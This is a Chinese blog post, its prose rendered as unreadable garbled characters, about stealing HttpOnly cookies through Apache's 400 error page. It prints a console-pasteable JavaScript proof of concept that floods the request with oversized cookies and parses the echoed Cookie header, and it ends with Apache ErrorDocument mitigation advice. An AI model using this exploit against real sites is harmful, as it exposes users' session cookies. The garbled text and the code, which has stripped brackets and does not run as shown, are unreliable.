Apache HttpOnly Cookie XSSվ©
ܶԼһЩҵ߳쿪ԴcmsϵͳΪ˷ֹxssȡûcookie⣬һ㶼øcookiehttponlyԣֱֹʹjsõûcookieӶxssΣպÿƹcookiehttponlyԡchromeһվ㣬F12߹ߣҵconsole´벢س:
// http://www.exploit-db.com/exploits/18442/
// Writes ten cookies named "xss0".."xss9" to the current origin, or removes
// them again when `good` is truthy.
//   good falsy  -> each cookie carries an 819-character value, so the
//                  browser's next request to this origin carries roughly
//                  8 KB of Cookie header (parseCookies below only acts if
//                  the server answers such a request with HTTP 400).
//   good truthy -> the same ten names are rewritten with an expiry one
//                  millisecond in the past, which deletes them.
// No return value; the only effect is on document.cookie.
function setCookies (good) {
// Construct string for cookie value: 819 'x' characters
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set (or expire) the ten cookies; `i` is reused from the loop above
for (i = 0; i < 10; i++) {
// Expire cookie: empty value, expires one millisecond ago
if (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set oversized cookie (no expiry, so it lives for the session)
else {
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
// Demonstrates the header-echo problem this page describes: plants the
// oversized cookies, sends a GET to "/", and if the server answers 400 with
// a <pre> block that echoes the request, extracts the echoed Cookie header
// (minus the padding cookies), shows it via alert() and cleans up.
// Cookies marked HttpOnly are normally invisible to script, so anything
// shown here came from the server's error body, not from document.cookie.
// No return value.
// Defence (per the notes below the listing): configure a fixed ErrorDocument
// for 400, or update Apache, so the error body never reflects request headers.
// NOTE(review): as reproduced on this page several bracket/index expressions
// in this function appear to have been stripped in transcription — an array
// is used where a single element is meant, and one statement is not valid
// JavaScript — so the listing does not run as shown.
function makeRequest() {
// `good` is undefined here, so this writes the ten oversized cookies
setCookies();
// readystatechange handler. `xhr` is the var declared later in this
// function; it is hoisted and assigned before the first event can fire.
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
// NOTE(review): match() returns null when no <pre> is present, so the
// `.length` test below throws instead of reporting "nothing echoed"
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content.replace("Cookie: ", "");
// Drop the padding cookies written by setCookies, then split the rest
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object as name -> value
for (var i=0; i<cookies.length; i++) {
var s_c = cookies.split('=',2);
cookie_dict] = s_c;
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request; the browser attaches the oversized cookies automatically
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
// Entry point: runs the demonstration once when the snippet is pasted into the console.
makeRequest();
ܿ400cookieϢ
صַhttps://gist.github.com/pilate/1955a1c28324d4724b7b/download#
Apacheٷṩ4ִʽhttp://httpd.apache.org/docs/2.0/mod/core.html#errordocument
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error messageһӲĴϢ
2. output a customized messageһϢ
3. redirect to a local URL-path to handle the problem/errorתһصԶҳ
4. redirect to an external URL to handle the problem/errorתһⲿURL
ԣ400ֻз2Чذٰcookie
Apacheã
ErrorDocument 400 " security test"
ȻapacheҲɣ
οhttp://httpd.apache.org/security/vulnerabilities_22.html
ҳ:
[1]